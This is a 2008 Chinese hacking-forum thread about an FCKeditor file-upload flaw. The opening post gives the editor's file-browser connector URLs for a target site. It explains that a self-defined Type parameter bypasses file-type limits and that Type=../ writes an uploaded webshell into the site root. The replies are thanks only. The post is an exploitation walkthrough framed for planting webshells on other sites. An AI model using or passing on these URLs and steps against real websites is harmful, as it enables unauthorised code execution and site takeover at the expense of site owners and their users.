fckeditor网页编辑器的漏洞

jack · 发表于 2008-3-12 13:59:21

htt p://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

htt p://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp

所传的文件就到了 htt p://www.xxx.tw/UserFiles/cnandbao/下了经过进一步的考虑,如果这样输入:ht tp://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.所传的文件就到了网站根目录下了

[ 本帖最后由 jack 于 2008-3-12 14:00 编辑 ]

dai5200 · 发表于 2009-4-14 20:51:50

谢谢分享

huyu8888 · 发表于 2009-4-18 17:07:09

很想做个网页,不过好象没有免费的上传位置

stephen · 发表于 2009-4-18 19:00:51

写得非常好~辛苦啦！谢谢！:hug:

zou315265641 · 发表于 2009-5-11 00:58:11

不错的分享，谢谢楼主了

如此、而已 · 发表于 2009-5-12 12:07:40

学习了谢楼主了 :loveliness:

joseph90 · 发表于 2010-7-3 10:27:20

谢谢楼主的分享！学习了

账号		自动登录	找回密码
密码			注册[Register]

fckeditor网页编辑器的漏洞

相关帖子